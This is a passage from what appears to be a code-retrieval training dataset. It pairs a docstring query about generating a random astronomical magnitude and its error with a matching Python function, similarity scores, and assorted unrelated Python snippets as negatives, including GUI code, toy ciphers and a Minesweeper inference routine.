self.initial_order_value = tk.StringVar(master)\n self.initial_order_value.set(str(self.markov_chain.order))\n\n self.order_selection = tk.Spinbox(master, values=tuple(range(1, 11)),\n width=self.spinbox_length,\n command=self.recompute_markov_chain)\n self.order_selection.config(textvariable=self.initial_order_value)\n self.order_selection.grid(row=self.order_row, column=self.options_column + 1)\n\n # Select the number sentences for the Markov Chain to output\n self.num_sentences_row = 3\n self.num_sentences_label = tk.Label(master, text='Number of Sentences')\n self.num_sentences_label.grid(row=self.num_sentences_row, column=self.options_column)\n\n self.initial_num_sentences = tk.StringVar(master)\n self.initial_num_sentences.set(str(self.number_of_sentences))\n\n self.num_sentences = tk.Spinbox(master, values=tuple(range(1, 51)),\n width=self.spinbox_length,\n command=self.set_number_of_sentences)\n self.num_sentences.config(textvariable=self.initial_num_sentences)\n self.num_sentences.grid(row=self.num_sentences_row, column=self.options_column + 1)\n\n # Set minimum sentence length for each of the Markov Chain's sentence outputs\n self.min_sentence_row = 4\n\n self.min_sentence_label = tk.Label(master, text='Min Sentence Length')\n self.min_sentence_label.grid(row=self.min_sentence_row, column=self.options_column)\n\n self.initial_min_sentence = tk.StringVar(master)\n 
self.initial_min_sentence.set(str(self.min_sentence_length))\n\n self.set_min_sentence = tk.Spinbox(master, values=tuple(range(1, 100)),\n width=self.spinbox_length,\n command=self.set_min_sentence_length)\n self.set_min_sentence.config(textvariable=self.initial_min_sentence)\n self.set_min_sentence.grid(row=self.min_sentence_row, column=self.options_column+1)\n\n # Set maximum sentence length for each of the Markov Chain's sentence outputs\n self.max_sentence_row = 5\n\n self.max_sentence_label = tk.Label(master, text='Max Sentence Length')\n self.max_sentence_label.grid(row=self.max_sentence_row, column=self.options_column)\n\n self.initial_max_sentence = tk.StringVar(master)\n self.initial_max_sentence.set(str(self.max_sentence_length))\n\n self.set_max_sentence = tk.Spinbox(master, values=tuple(range(2, 101)),\n width=self.spinbox_length,\n command=self.set_max_sentence_length)\n self.set_max_sentence.config(textvariable=self.initial_max_sentence)\n self.set_max_sentence.grid(row=self.max_sentence_row, column=self.options_column+1)\n\n # Radio buttons controlling if this GUI's Markov Chain should work with words or individual chars.\n self.words_or_char_row = 6\n self.master_variable = tk.StringVar()\n self.words_radio_button = tk.Radiobutton(master, text='Words', variable=self.master_variable, value='a',\n command=self.set_markov_chain_to_words)\n self.chars_radio_button = tk.Radiobutton(master, text='Chars', variable=self.master_variable, value='b',\n command=self.set_markov_chain_to_chars)\n self.words_radio_button.select()\n self.words_radio_button.grid(row=self.words_or_char_row, column=self.options_column)\n self.chars_radio_button.grid(row=self.words_or_char_row, column=self.options_column+1)\n\n # Generates a new batch of output from the Markov Chain, based off current constants like order, min/max\n # sentence length, etc.\n self.generate = tk.Button(master, text=\"Generate Text\", height=self.button_height, width=self.button_width,\n bg=self.button_off_color, activebackground=self.button_on_color,\n command=self.generate_babble_text)\n self.generate.grid(row=7, column=self.options_column, columnspan=self.button_column_span)\n\n # Saves the Markov Chain output last outputted to .txt file\n self.save_file = tk.Button(master, text='Save Text', height=self.button_height, width=self.button_width,\n bg=self.button_off_color, activebackground=self.button_on_color,\n command=self.save_babble)\n self.save_file.grid(row=8, column=self.options_column, columnspan=self.button_column_span)",
"def recompute_output_text(self):\r\n s = self.input_string.get()\r\n senc = rotcode.rotate(s,steps=self.steps.get())\r\n if self.reverse_flag.get():\r\n # Reverse the encoded text\r\n senc = senc[::-1]\r\n self.output_string.set(senc)",
"def _characters(self):\n self.characters = list(\n set([item for sublist in self.grid for item in sublist])\n )\n return self.characters",
"def add_knowledge(self, cell, count):\n self.moves_made.add(cell)\n self.mark_safe(cell)\n cells=set()\n #print(\"yo\")\n for i in range(cell[0]-1, cell[0]+2):\n for j in range(cell[1]-1, cell[1]+2):\n if i>=0 and j>=0 and i<self.height and j<self.width:\n if (i,j)==cell:\n continue\n if (i,j) in self.mines:\n count=count-1\n\n elif (i,j) not in self.safes and (i,j) not in self.moves_made:\n cells.add((i,j))\n\n a=Sentence(cells, count)\n r=len(self.knowledge)\n #print(\"go\")\n '''Ignore this code\n while i<r:\n if self.knowledge[i].getcells().issubset(a.cells):\n #self.knowledge.append(Sentence(cells-self.knowledge[i].getcells(), count-self.knowledge[i].getcount()))\n a=Sentence(cells-self.knowledge[i].getcells(), count-self.knowledge[i].getcount())\n if cells.issubset(self.knowledge[i].getcells()):\n self.knowledge[i]=Sentence(self.knowledge[i].getcells()-cells, self.knowledge[i].getcount()-count)\n i+=1\n '''\n self.knowledge.append(a)\n #print(\"no\")\n r=range(len(self.knowledge))\n i=0\n while i<len(self.knowledge):\n if (self.knowledge[i].known_safes()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_safes()):\n self.mark_safe(cell)\n self.knowledge.pop(i)\n elif (self.knowledge[i].known_safes()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_mines()):\n self.mark_mine(cell)\n self.knowledge.pop(i)\n else: \n i=i+1\n\n r=range(len(self.knowledge))\n\n for i in r:\n for j in range(i+1, len(self.knowledge)):\n if self.knowledge[i].getcells().issubset(self.knowledge[j].getcells()):\n #self.knowledge.append(Sentence(cells-self.knowledge[i].getcells(), count-self.knowledge[i].getcount()))\n self.knowledge[j]=Sentence(self.knowledge[j].getcells()-self.knowledge[i].getcells(), self.knowledge[j].getcount()-self.knowledge[i].getcount())\n elif self.knowledge[j].getcells().issubset(self.knowledge[i].getcells()):\n self.knowledge[i]=Sentence(self.knowledge[i].getcells()-self.knowledge[j].getcells(), self.knowledge[i].getcount()-self.knowledge[j].getcount())\n\n i=0\n while i<len(self.knowledge):\n if (self.knowledge[i].known_safes()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_safes()):\n self.mark_safe(cell)\n self.knowledge.pop(i)\n elif (self.knowledge[i].known_mines()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_mines()):\n self.mark_mine(cell)\n self.knowledge.pop(i)\n else: \n i=i+1\n\n #print(\"mines\",len(self.mines))\n \n #raise NotImplementedError",
"def add_knowledge(self, cell, count):\n # First, just update some basic information\n self.moves_made.add(cell)\n self.mark_safe(cell)\n # Getting the neighbouring cells\n cells = set([])\n for i in range(cell[0] - 1, cell[0] + 2):\n for j in range(cell[1] - 1, cell[1] + 2):\n\n # Ignore the cell itself\n if (i, j) == cell:\n continue\n\n # Update count if cell in bounds and is mine\n if 0 <= i < self.height and 0 <= j < self.width:\n cells.add((i,j))\n # Make sure to eliminate the known safes\n sentence = Sentence(cells - self.safes, count)\n # As well as the known mines\n for mine in self.mines:\n sentence.mark_mine(mine)\n\n # Then the knowledge base is updated\n self.knowledge.append(sentence)\n #for sentence in self.knowledge:\n #print(sentence)\n\n # Now I update the ai's knowledge until no new knowledge is made\n # First I'll check if the sentence is empty, and remove if it is\n count = 1\n # Repeat until no new changes\n while count:\n count = 0\n to_be_removed = set()\n # update any known safes or mines\n self.check_all_mines_safes()\n # Compare every pair of sentence in knowledge that is not empty\n for i in range(len(self.knowledge)):\n for j in range(i + 1, len(self.knowledge)):\n # Now I'll compare knowledge of sentence in i and j\n sentence1 = self.knowledge[i]\n sentence2 = self.knowledge[j]\n\n # First, I check if they are empty\n if sentence1.cells == set():\n to_be_removed.add(i)\n #print('first is empty')\n break\n if sentence2.cells == set():\n to_be_removed.add(j)\n #print('second is empty')\n continue\n # Or equal to each other,\n # Then I remove the sentences\n if sentence1 == sentence2:\n to_be_removed.add(j)\n #print('same')\n continue\n\n # Start to compare using information from cs50\n # The superset will be replaced with newer sentence which is smaller.\n if sentence1.cells.issubset(sentence2.cells):\n # remove the larger set\n to_be_removed.add(j)\n self.knowledge.append(Sentence(sentence2.cells - sentence1.cells, sentence2.count - sentence1.count))\n count += 1\n #print('sentence 1 is subset of sentence 2')\n #print('*' * 10)\n #print('sentence 1: ', sentence1)\n #print('sentence 2: ', sentence2)\n #print(\"*\" * 10)\n elif sentence2.cells.issubset(sentence1.cells):\n to_be_removed.add(i)\n self.knowledge.append(Sentence(sentence1.cells - sentence2.cells, sentence1.count - sentence2.count))\n count += 1\n #print('sentence 2 is subset of sentence 1')\n #print('*' * 10)\n #print('sentence 1: ', sentence1)\n #print('sentence 2: ', sentence2)\n #print(\"*\" * 10)\n # Now I remove the unnecessary sentences from knowledge\n # From largest\n for index in sorted(list(to_be_removed))[::-1]:\n self.knowledge.pop(index)",
"def _updateMetric(self, i, char):\n # Set the metric\n if i == 0:\n off = glm.vec2(0., 0.)\n kern = glm.vec2(0.0, 0.0)\n else:\n off = glm.vec2(self._string_metric[i-1][2])\n kern = glm.vec2(self.font.getKerning(self.text[i - 1], char))\n glyph = self.extracted.get(ord(char), None)\n if glyph:\n horz_advance = glyph.get('horz_advance', 0.0)\n else:\n horz_advance = 0.0\n self._lineWidth += horz_advance\n self._labelWidth = max(self._labelWidth, self._lineWidth)\n if char == '\\n':\n off.x = 0.0\n next_char_shift = glm.vec2(off)\n self._lineWidth = 0\n textHeight = self.font.table['linespace']\n next_char_shift.y -= textHeight\n self._labelHeight += textHeight\n else:\n next_char_shift = glm.vec2(off) + glm.vec2(horz_advance, 0) + kern\n self._string_metric = self._string_metric[:i]\n self._string_metric.append((glm.vec2(off), kern, next_char_shift))\n return off, kern",
"def supercombiner(bot, ev):\n # ported from jenni\n s = 'u'\n for i in iter(range(1, 3000)):\n if unicodedata.category(chr(i)) == \"Mn\":\n s += chr(i)\n if len(s) > 100:\n break\n bot.say(s)",
"def step1ab(self):\n\t\tif self.b[self.k] == 's':\n\t\t\tif self.ends(\"sses\"):\n\t\t\t\tself.k = self.k - 2\n\t\t\telif self.ends(\"ies\"):\n\t\t\t\tself.setto(\"i\")\n\t\t\telif self.b[self.k - 1] != 's':\n\t\t\t\tself.k = self.k - 1\n\t\tif self.ends(\"eed\"):\n\t\t\tif self.m() > 0:\n\t\t\t\tself.k = self.k - 1\n\t\telif (self.ends(\"ed\") or self.ends(\"ing\")) and self.vowelinstem():\n\t\t\tself.k = self.j\n\t\t\tif self.ends(\"at\"): self.setto(\"ate\")\n\t\t\telif self.ends(\"bl\"): self.setto(\"ble\")\n\t\t\telif self.ends(\"iz\"): self.setto(\"ize\")\n\t\t\telif self.doublec(self.k):\n\t\t\t\tself.k = self.k - 1\n\t\t\t\tch = self.b[self.k]\n\t\t\t\tif ch == 'l' or ch == 's' or ch == 'z':\n\t\t\t\t\tself.k = self.k + 1\n\t\t\telif (self.m() == 1 and self.cvc(self.k)):\n\t\t\t\tself.setto(\"e\")",
"def __macronize(self):\n self.macronizations = [Scansion(\"\")]\n for i, word in enumerate(self.words):\n new_macrons = []\n for exist in self.macronizations:\n for macrons in word.macronize():\n new_macrons.append(exist + macrons)\n self.macronizations = new_macrons",
"def undo_glycan(self):\n chid = self.chain.get()\n sequon = self.sequon.get()\n self.sequon_colors[sequon] = [.5, .5, .5]\n key = self.sequon.get()\n if key in self.linked_glycanMolecules:\n del self.linked_glycanMolecules[key]\n del self.linked_glycans[key]\n self.draw_glycoprotein(chid)\n self.draw_glycan(sequon)",
"def on_origEdit_textChanged(self):\n self.__updatePronounceButtons()\n self.__updateClearButton()\n self.__updateTranslateButton()",
"def alphabet_press(user_letter_pick):\n # Checks to see if the START NEW GAME button was successfully pressed w/o error\n if lets_begin.winfo_exists() != 1:\n messagebox.showwarning(title=\"Pump the brakes!\", message=\"It appears you've gotten a bit ahead of\\n\"\n \"yourself, though your eagerness is appreciated\\n\"\n \"please follow procedure :\\\\\")\n else:\n attempt = multiple_letters_check(user_letter_pick)\n if attempt == True: # Checks if the user entered the same letter, ignores if it's the first iteration\n global first_strike_through\n first_strike_through = True\n global past_first_iteration\n global make_to_string\n if past_first_iteration == True:\n b_label = []\n blanks = return_to_string # Just giving it a name with better context\n else:\n b_label = []\n blanks = make_to_string\n for n in blanks: # Creating a list of chars from the string of blanks\n b_label += n\n conversion = [] # used to combine the original entry into a string with \" \" in between the chars\n global original_user_entry\n original_entry_length = len(original_user_entry)\n # create a string of the original entry + \" _\"\n for h in range(original_entry_length): # create a string of the original entry + \" \" to gain the length\n conversion.append(\" \")\n conversion.append(original_user_entry[h])\n remove_end_spaces(conversion) # Removes any additional spaces from the end\n remove_double_spaces(conversion) # Removes the space (' ') before any double spaces created by newlines (\\n)\n global game_over\n global correct_guess_count\n global blank_labels\n global new_blank_labels\n good_guess = FALSE\n j = 0\n for letters in conversion: # This loop checks if the user's pick matches any of the letters from the original entry\n if letters == ' ':\n j += 1\n continue # skips an iteration\n if letters == alphabet[user_letter_pick]: # If the user guesses the correct letter\n b_label[j] = alphabet[user_letter_pick] # Assign the letter corresponding spot in the string\n make_to_string = \"\" # resets the variable\n for c in b_label: # this conversion back to a string is to make the labels look better\n make_to_string += c\n new_blank_labels = Label(root, text=make_to_string, bg=\"gray\", fg=\"white\") # Update the Blanks label\n new_blank_labels.grid(row=65, column=9, rowspan=19, columnspan=2, sticky='NESW')\n past_first_iteration = False # Causes make_to_string to hold its value\n good_guess = TRUE # The player guessed the right letter\n correct_guess_count += 1\n if correct_guess_count == length_of_chars_only: # The User wins the game!!\n # Clears this info\n make_to_string = \"\"\n correct_guess_count = 0\n b_label.clear()\n blanks = \"\"\n conversion.clear()\n j = 0\n past_first_iteration = True\n first_strike_through = False\n strike_one.clear()\n winner() # Let's the player know they won and displays the winner graphic\n j += 1\n if good_guess == FALSE: # The player guessed the wrong letter\n game_over += 1\n if game_over >= 6:\n # Clears this info\n make_to_string = \"\"\n b_label.clear()\n blanks = \"\"\n conversion.clear()\n j = 0\n past_first_iteration = True\n first_strike_through = False\n strike_one.clear()\n game_over_remove_labels(game_over) # Removes the labels based on the parameters\n if game_over >= 6:\n game_over = 0\n correct_guess_count = 0\n strike_one.append(user_letter_pick)",
"def update_letters_guessed(self, letter):\n self.letters_guessed = self.letters_guessed + letter",
"def coding():\r\n \r\n key={'reverse_word': False, 'reverse_string': False, 'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd', 'e': 'e', 'f': 'f', 'g': 'g', 'h': 'h',\r\n 'i': 'i', 'j': 'j', 'k': 'j', 'l': 'l', 'm': 'm', 'n': 'n', 'o': 'o', 'p': 'p', 'q': 'q', 'r': 'r', 's': 's', 't': 't', 'u': 'u',\r\n 'v': 'v', 'w': 'w', 'x':'x', 'y': 'y', 'z': 'z'}\r\n x=0 #determine the sliding of the letters\r\n \r\n def isKeyEmpty(k):\r\n \"\"\"Utility Function that checks if key is empty\"\"\"\r\n if k=={'reverse_word': False, 'reverse_string': False, 'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd', 'e': 'e', 'f': 'f', 'g': 'g', 'h': 'h',\r\n 'i': 'i', 'j': 'j', 'k': 'j', 'l': 'l', 'm': 'm', 'n': 'n', 'o': 'o', 'p': 'p', 'q': 'q', 'r': 'r', 's': 's', 't': 't', 'u': 'u',\r\n 'v': 'v', 'w': 'w', 'x':'x', 'y': 'y', 'z': 'z'}:\r\n return True\r\n return False\r\n \r\n def set_key(vars): #vars=[0]num,[1]rWord,[2]rString\r\n \"\"\"Function that set the new key\"\"\"\r\n nonlocal key\r\n nonlocal x\r\n x=vars[0]\r\n if (vars[1]=='yes'):\r\n key['reverse_word']=True\r\n if (vars[2]=='yes'):\r\n key['reverse_string']=True\r\n if (x<-26 or x>26):\r\n x=x%26 #makes x to be in range\r\n if (x==0):\r\n x=random.randrange(-26,26) #random number\r\n for i in range (97,123): #26 ABC letters, ASCII value of 'a' is 97 97+26=123\r\n if(i+x>122):\r\n key[chr(i)]=chr(i-25+x)\r\n elif (i+x<97):\r\n key[chr(i)]=chr(i+26+x)\r\n else:\r\n key[chr(i)]=chr(i+x)\r\n print(\"done\")\r\n \r\n def empty_key():\r\n \"\"\"Function makes current key empty\"\"\"\r\n nonlocal key\r\n nonlocal x\r\n x=0\r\n key={'reverse_word': False, 'reverse_string': False, 'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd', 'e': 'e', 'f': 'f', 'g': 'g', 'h': 'h',\r\n 'i': 'i', 'j': 'j', 'k': 'j', 'l': 'l', 'm': 'm', 'n': 'n', 'o': 'o', 'p': 'p', 'q': 'q', 'r': 'r', 's': 's', 't': 't', 'u': 'u',\r\n 'v': 'v', 'w': 'w', 'x':'x', 'y': 'y', 'z': 'z'}\r\n print(\"done\")\r\n \r\n def export_key():\r\n \"\"\"Function export key\"\"\"\r\n if(isKeyEmpty(key)):\r\n print(\"key empty\")\r\n else:\r\n return key\r\n \r\n def import_key(key2):\r\n \"\"\"Function import key\"\"\"\r\n nonlocal key\r\n if(isKeyEmpty(key2)):\r\n print(\"key is empty\")\r\n else:\r\n key=key2\r\n print(\"done\")\r\n \r\n def encoding(sentence):\r\n \"\"\"function encoding given string with the key\"\"\"\r\n sentence=list(sentence)\r\n for i in range(len(sentence)):\r\n if (sentence[i]!=' '):\r\n sentence[i]=key[sentence[i]]\r\n sentence=''.join(sentence)\r\n if(key['reverse_word']==True):\r\n splitT=tuple(sentence.split(' '))\r\n splitT=map(lambda x:x[::-1],splitT)\r\n sentence=' '.join(splitT)\r\n if(key['reverse_string']==True):\r\n splitList=sentence.split(' ')\r\n splitList=splitList[-1::-1]\r\n sentence=' '.join(splitList)\r\n return sentence\r\n \r\n def decoding(sentence):\r\n \"\"\"function decoding given string with the key\"\"\"\r\n if(isKeyEmpty(key)):\r\n return \"key empty\"\r\n helpKey=dict((y,x) for x,y in key.items())\r\n if(key['reverse_word']==True):\r\n splitT=tuple(sentence.split(' '))\r\n splitT=map(lambda x:x[::-1],splitT)\r\n sentence=' '.join(splitT)\r\n if(key['reverse_string']==True):\r\n splitList=sentence.split(' ')\r\n splitList=splitList[-1::-1]\r\n sentence=' '.join(splitList)\r\n sentence=list(sentence)\r\n for i in range(len(sentence)):\r\n if(sentence[i]!=' '):\r\n sentence[i]=helpKey[sentence[i]]\r\n sentence=''.join(sentence)\r\n return sentence\r\n\r\n def dispatch(message,var=None):\r\n \"\"\"dispatch with message passing\"\"\"\r\n if message=='set_key':\r\n set_key(var)\r\n 
elif message=='empty_key':\r\n empty_key()\r\n elif message=='export_key':\r\n return export_key()\r\n elif message=='import_key':\r\n import_key(var)\r\n elif message=='encoding':\r\n return encoding(var)\r\n elif message=='decoding':\r\n return decoding(var)\r\n else:\r\n print(\"Unknown message\") \r\n return dispatch",
"def _translate(self):\r\n\r\n for place, pseudo_binary in self.letters.items():\r\n for letter in self.alphabet:\r\n\r\n with open(os.path.join(self.training_data_folder, letter + '.json'), 'r', encoding = 'utf-8') as js:\r\n data = json.loads(js.read())\r\n\r\n if pseudo_binary in data:\r\n self.result[place] = letter\r\n break\r\n\r\n else:\r\n self.result[place] = '-'\r\n\r\n if not self.devmode:\r\n return 'Not solved'\r\n\r\n return ''.join(self.result.values())",
"def is_managar(window):\n enter_code = Text(Point(130,150), \"Enter Manager Code(0 if no managar):\")\n code = Text(Point(130,130),\"\")\n max_chr = Text(Point(130,110), \"Maximum character!\")\n illegal_code = Text(Point(130,110),\"Illegal Code!\")\n wrong_code = Text(Point(130,110),\"Wrong Code!\")\n\n wrong_code.setTextColor(\"red\")\n illegal_code.setTextColor(\"red\")\n max_chr.setTextColor(\"red\")\n\n enter_code.draw(window)\n code.draw(window)\n while (True):\n new_chr = window.getKey()\n max_chr.undraw()\n wrong_code.undraw()\n illegal_code.undraw()\n if new_chr == \"Return\":\n if len(code.getText()) > 4:\n max_chr.draw(window)\n wrong_code.undraw()\n if len(code.getText()) < 1:\n illegal_code.draw(window)\n wrong_code.undraw()\n if code.getText() == MANAGAR_CODE:\n return True\n if code.getText() == \"0\":\n return False\n if code.getText() != MANAGAR_CODE and len(code.getText()) > 0:\n wrong_code.draw(window)\n\n if new_chr == \"Space\":\n code.setText(code + \" \")\n if new_chr == \"BackSpace\":\n code.setText(code.getText() + new_chr)\n code = delete_chr(code)\n else:\n if len(new_chr)> 1:\n continue\n if (ord(new_chr) > 126 or ord(new_chr) < 33):\n continue\n else:\n code.setText(code.getText() + new_chr)\n if len(code.getText()) < 5:\n code.undraw()\n code.draw(window)\n else:\n max_chr.draw(window)\n code.setText(code.getText()[:-1])",
"def on_transEdit_textChanged(self):\n self.__updatePronounceButtons()\n self.__updateClearButton()",
"def cipher_feedback(self):",
"def knowledge_refresh(self):\n knowledge_len = len(self.knowledge)\n for i, sentence in enumerate(deepcopy(self.knowledge)):\n if sentence.cells != set():\n for j in range(i+1, knowledge_len):\n if self.knowledge[j].cells != set() and sentence.cells != self.knowledge[j].cells:\n if sentence.cells.issubset(self.knowledge[j].cells):\n new_set = self.knowledge[j].cells.difference(sentence.cells)\n new_count = self.knowledge[j].count - sentence.count\n if new_set != set():\n new_sentence = Sentence(cells=new_set, count=new_count)\n if not new_sentence in self.knowledge:\n self.knowledge.append(new_sentence)\n\n elif self.knowledge[j].cells.issubset(sentence.cells):\n new_set = sentence.cells.difference(self.knowledge[j].cells)\n new_count = sentence.count - self.knowledge[j].count\n if new_set != set():\n new_sentence = Sentence(cells=new_set, count=new_count)\n if not new_sentence in self.knowledge:\n self.knowledge.append(new_sentence)\n \n # remove unnecessery knowledge\n if sentence.cells == set() and sentence.known_mines() == set() and sentence.known_safes() == set():\n self.knowledge.remove(sentence)",
"def OnKeyUp(self, event):\r\n\r\n if not self._finished:\r\n\r\n # auto-grow the textctrl:\r\n parentSize = self._owner.GetSize()\r\n myPos = self.GetPosition()\r\n mySize = self.GetSize()\r\n \r\n sx, sy = self.GetTextExtent(self.GetValue() + \"M\")\r\n if myPos.x + sx > parentSize.x:\r\n sx = parentSize.x - myPos.x\r\n if mySize.x > sx:\r\n sx = mySize.x\r\n \r\n self.SetSize((sx, -1))\r\n\r\n event.Skip()",
"def determine_input_alphabet(self, reset=True):\n if reset:\n ain = set()\n else:\n ain = set(self.input_alphabet)\n\n for t in self.iter_transitions():\n for letter in t.word_in:\n ain.add(letter)\n self.input_alphabet = list(ain)",
"def modified_flag(self, event):\n text = self.get_current()\n text.modified = 1",
"def _setText(self, text):\n self.text = \"\"\n for ch in text:\n char, vertices, glyph = self._extractGlyph(ch)\n if not self.text:\n off, kern = self._updateMetric(0, char)\n if vertices is not None and not char in self.NO_GLYPH_CHARS:\n vertices['vtx'] += off + glyph['offset']\n self.allVertices = np.hstack(vertices)\n self.allIndices = self._baseInd\n self.text += char\n else:\n pos = len(self.text)\n nonGlyph = countInSet(self.text, self.NO_GLYPH_CHARS)\n # Set the metric\n off, kern = self._updateMetric(pos, char)\n if vertices is not None and not char in self.NO_GLYPH_CHARS:\n vertices['vtx'] += off + kern + glyph['offset']\n if self.allVertices is None:\n self.allVertices = np.hstack(vertices)\n else:\n self.allVertices = np.append(self.allVertices,\n vertices)\n if self.allIndices is None:\n self.allIndices = self._baseInd\n else:\n self.allIndices = np.vstack((self.allIndices,\n self._baseInd + (pos - nonGlyph) * 4))\n self.text += char\n self.setUniforms()"
] |
[
"0.6082565",
"0.57227516",
"0.5720472",
"0.5489015",
"0.5296242",
"0.5296242",
"0.52733576",
"0.52166784",
"0.521666",
"0.5161676",
"0.51242065",
"0.5092522",
"0.5079919",
"0.50704604",
"0.5066467",
"0.4993566",
"0.49751157",
"0.49563563",
"0.4953338",
"0.49358505",
"0.49318457",
"0.49247134",
"0.49169144",
"0.49114305",
"0.49006176",
"0.48997447",
"0.48785114",
"0.4875536",
"0.4874211",
"0.4869026"
] |
0.7340027
|
0
|
Return a random magnitude with the corresponding error
|
def _random_magnitude_error(self):
magnitude = random.uniform(MIN_MAG, MAX_MAG)
snr = random.uniform(MIN_SNR, MAX_SNR)
merror = snr_to_error(snr)[1] # the positive error
return magnitude, merror
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _random_error(self):\n return self._random_magnitude_error()[1]",
"def random() -> float:\n ...",
"def mag_err(self):\n return self.photosamplers.get_estimate(mag=True)[1:]",
"def random_float():\n return (random() - 0.5) * 2",
"def random():\r\n return R.NextDouble()",
"def eff_random(eff_mean, tau_std):\n tau = (-1.0/np.log(eff_mean))/(2*np.pi)\n tau = np.random.normal(tau, tau_std)\n return np.exp(-1/(2*np.pi*tau))",
"def random_normal():\r\n return inverse_normal_cdf(random.random())",
"def mag_to_flux(m,merr):\n fluxes = np.zeros(len(m))\n fluxes_err = np.zeros(len(m))\n for i in range(len(m)):\n dist = 10**(-np.random.normal(m[i],merr[i],1000)/2.51)\n fluxes[i] = np.mean(dist)\n fluxes_err[i] = np.sqrt(np.var(dist))\n return fluxes,fluxes_err",
"def random_normal():\n return inverse_normal_cdf(random.random())",
"def testGetVegaMag(self):\n std = MKIDStd.MKIDStd()\n vegaFlux = std.load(\"vega\")\n bd17Flux = std.load(\"bd17\")\n for filter in ['U','B','V','R','I']:\n aFilter = std.filters[filter] \n mag = std.getVegaMag(vegaFlux, aFilter)\n self.assertAlmostEqual(0.03, mag, msg=\"filter=%s mag=%f\"%(filter,mag))",
"def random_vector_in_unit_ball():\n x = np.random.normal(loc=0.0, scale=1.0, size=(numSamples, self.dim))\n z = np.random.exponential(scale=1.0, size=(numSamples,))\n d = (np.sum(np.square(x), axis=1) + z) ** 0.5\n d = d[:, np.newaxis]\n return x / d",
"def pull_arm(self):\n return np.random.normal(loc = 0, scale = 1)+self.mean",
"def randerr(size=1,func='normal',**kwargs):\n kwargs.update(size=size)\n funclower = func.lower()\n if funclower in ['normal','gaussian','gauss']:\n rvs = stats.norm.rvs\n elif funclower in ['uniform']:\n rvs = stats.uniform(-1,2).rvs\n elif funclower in ['lorentzian','cauchy']:\n rvs = stats.cauchy.rvs\n elif funclower in ['delta']:\n rvs = stats.randint(1,2).rvs\n else:\n raise Exception('Unrecognized type: %s'%func)\n return rvs(**kwargs)",
"def get_mag(self):\n raise NotImplementedError",
"def testCalspecMags(self):\n std = MKIDStd.MKIDStd()\n bFilter = std.filters['B']\n vFilter = std.filters['V']\n\n # BD17\n bd17Flux = std.load(\"bd17\")\n B = std.getVegaMag(bd17Flux, bFilter)\n V = std.getVegaMag(bd17Flux, vFilter)\n self.assertAlmostEqual(B-V, 0.44, places=1, msg=\"value=%f\"%B)\n self.assertAlmostEqual(B, 9.47, places=0, msg=\"value=%f\"%B)",
"def magnitude(self):\n\t\treturn sqrt(self.dot(self))",
"def random_velocity():\n vel_dir = np.random.random(2) * 2 - 1\n vel = vel_dir * np.random.randint(2, 6)\n vel = np.where(np.abs(vel) > 1, vel, (vel / vel) * 1).astype(np.float16)\n return vel",
"def normal(mean, std):\n\n return random.gauss(mean, std)",
"def magnitude(a):\n return dot_product(a, a)**0.5",
"def _randomVelocity(self):\n\t\treturn random.choice([-1, 1]) * random.randint(10, 50)",
"def _get_gaussian_random(self):\n u1 = generateRandom()\n u2 = generateRandom()\n if u1 < 1e-6:\n u1 = 1e-6\n return sqrt(-2 * log(u1)) * cos(2 * pi * u2)",
"def mag(a):\n return sqrt(a[0]*a[0]+a[1]*a[1]+a[2]*a[2])",
"def fluxerr_to_ABmagerr(ferr, f):\n merr = (ferr/f) * (2.5/m.log(10))\n return np.fabs(merr)",
"def mag(self):\n return np.linalg.norm(self._vals)",
"def mag(self) -> float:\n return sqrt(self.sqr_mag())",
"def get_value(self) -> float:\n return random.gauss(self._mu, self._sigma)",
"def computeMagnitudeErr(instFluxErr, instFlux, calibrationErr, calibration, flux):\n return 2.5/np.log(10)*computeMaggiesErr(instFluxErr, instFlux, calibrationErr, calibration, flux) / flux",
"def exo1():\n randu = randn(N/ 2, N/ 2, 2); % a random vector field\n b = 2\n for i in 1: 4:\n LLs_u = Li{i}(LiS{i}(randu))\n % relative error should be very small\n norm(abs(LLs_u(: ) - b*randu(: )))/ norm(randu(: ))",
"def magnitude(p):\n return sqrt((p**2).sum())",
"def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]"
] |
[
"0.81969005",
"0.62485933",
"0.6231532",
"0.60908645",
"0.6088968",
"0.59982437",
"0.59946096",
"0.5939237",
"0.59085435",
"0.5882188",
"0.5876455",
"0.5862307",
"0.5852154",
"0.58491963",
"0.58294046",
"0.5827964",
"0.5806923",
"0.57921576",
"0.57457095",
"0.5741895",
"0.5741453",
"0.5739273",
"0.57330716",
"0.5712108",
"0.5699169",
"0.56875855",
"0.56433505",
"0.5642692",
"0.56406116",
"0.5630641"
] |
0.8595285
|
0
|
Return a random error in magnitudes
|
def _random_error(self):
return self._random_magnitude_error()[1]
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _random_magnitude_error(self):\n magnitude = random.uniform(MIN_MAG, MAX_MAG)\n snr = random.uniform(MIN_SNR, MAX_SNR)\n merror = snr_to_error(snr)[1] # the positive error\n return magnitude, merror",
"def random() -> float:\n ...",
"def random_float():\n return (random() - 0.5) * 2",
"def random():\r\n return R.NextDouble()",
"def mag_err(self):\n return self.photosamplers.get_estimate(mag=True)[1:]",
"def exo1():\n randu = randn(N/ 2, N/ 2, 2); % a random vector field\n b = 2\n for i in 1: 4:\n LLs_u = Li{i}(LiS{i}(randu))\n % relative error should be very small\n norm(abs(LLs_u(: ) - b*randu(: )))/ norm(randu(: ))",
"def random_normal():\r\n return inverse_normal_cdf(random.random())",
"def expected_error(noise_param, states):\n\n from math import comb\n import preferences\n\n comparison_errors = [\n preferences.comparison_error(\n state / states,\n noise_param\n )\n for state in range(1, states)\n ]\n\n n_choose_2 = comb(states, 2)\n\n expected_error = 0.0\n for i, p in enumerate([(states - x)/n_choose_2 for x in range(1, states)]):\n expected_error += p * comparison_errors[i]\n\n return round(expected_error, 3)",
"def safe_rand(self):\n rand_n = np.random.rand()\n if rand_n == float(1):\n rand_n -= 1e-10\n return rand_n",
"def time_to_failure():\r\n return random.expovariate(BREAK_MEAN)",
